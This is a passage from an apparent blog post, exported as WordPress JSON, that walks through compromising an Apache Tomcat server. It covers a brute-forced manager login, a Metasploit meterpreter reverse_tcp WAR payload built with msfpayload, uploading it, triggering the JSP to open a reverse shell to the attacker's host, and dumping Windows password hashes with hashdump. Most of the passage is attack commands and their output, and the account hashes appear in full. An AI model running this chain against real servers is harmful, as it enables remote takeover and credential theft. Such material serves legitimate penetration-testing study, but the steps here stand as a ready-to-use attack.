1
<\/div><\/td>
. \/<\/span>msfpayload windows\/<\/span>meterpreter\/<\/span>reverse_tcp LHOST<\/span>=192.168.1.109 LPORT<\/span>=4545<\/span> W ><\/span>; \/<\/span>root\/<\/span>MetRev.war<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nLog into the interface at http:\/\/192.168.1.112:8080\/manager\/html and upload the payload.<\/p>\n Once uploaded you then need to connect to the jsp file, the name can be found inside the WAR by quickly unzipping:<\/p>\n 1 2 3 4 5 6 7 8 9 10 11 <\/div><\/td> root@bt:~# <\/span>unzip<\/span> -l<\/span> MetRev.war
\nArchive: MetRev.war
\nLength Date Time Name
\n---------<\/span> ----------<\/span> -----<\/span> ----<\/span>
\n71<\/span> 2011<\/span>-05-22<\/span> 19<\/span>:06 META-INF\/<\/span>MANIFEST.MF
\n0<\/span> 2011<\/span>-05-22<\/span> 19<\/span>:06 WEB-INF\/<\/span>
\n267<\/span> 2011<\/span>-05-22<\/span> 19<\/span>:06 WEB-INF\/<\/span>web.xml
\n1578<\/span> 2011<\/span>-05-22<\/span> 19<\/span>:06 nqaxmatvd.jsp
\n147604<\/span> 2011<\/span>-05-22<\/span> 19<\/span>:06 jVfQFWuAPAToYS.txt
\n---------<\/span> -------<\/span>
\n149520<\/span> 5<\/span> files<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nStart the meterpreter reverse_tcp handler and before you know it…
\nhttp:\/\/192.168.1.112:8080\/MetRev\/nqaxmatvd.jsp ROOT!!!!<\/p>\n 1 2 3 4 5 6 7 8 9 10 11 <\/div><\/td> msf exploit (<\/span>handler)<\/span> ><\/span> exploit
\n[<\/span>*<\/span>]<\/span> Started reverse handler on 192.168.1.109:4444<\/span>
\n[<\/span>*<\/span>]<\/span> Starting the payload handler...
\n[<\/span>*<\/span>]<\/span> Sending stage (<\/span>749056<\/span> bytes)<\/span> to 192.168.1.112
\n[<\/span>*<\/span>]<\/span> Meterpreter session 1<\/span> opened (<\/span>192.168.1.109:4444<\/span> -><\/span> 192.168.1.112:1084<\/span>)<\/span> at 2011<\/span>-05-22<\/span> 19<\/span>:09:26<\/span> +0100
\nmeterpreter ><\/span> getuid
\nServer username: NT AUTHORITY\\SYSTEM
\nmeterpreter ><\/span> hashdump
\nAdministrator:500<\/span>:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
\nGuest:501<\/span>:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\nSUPPORT_388945a0?:1001<\/span>:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3:::<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit. msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box. 1.\/msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; \/root\/MetRev.war Log into […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[46,45,44,47,42,43],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/79"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=79"}],"version-history":[{"count":6,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/79\/revisions"}],"predecessor-version":[{"id":85,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/79\/revisions\/85"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=79"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=79"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=79"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}} | |
| |
|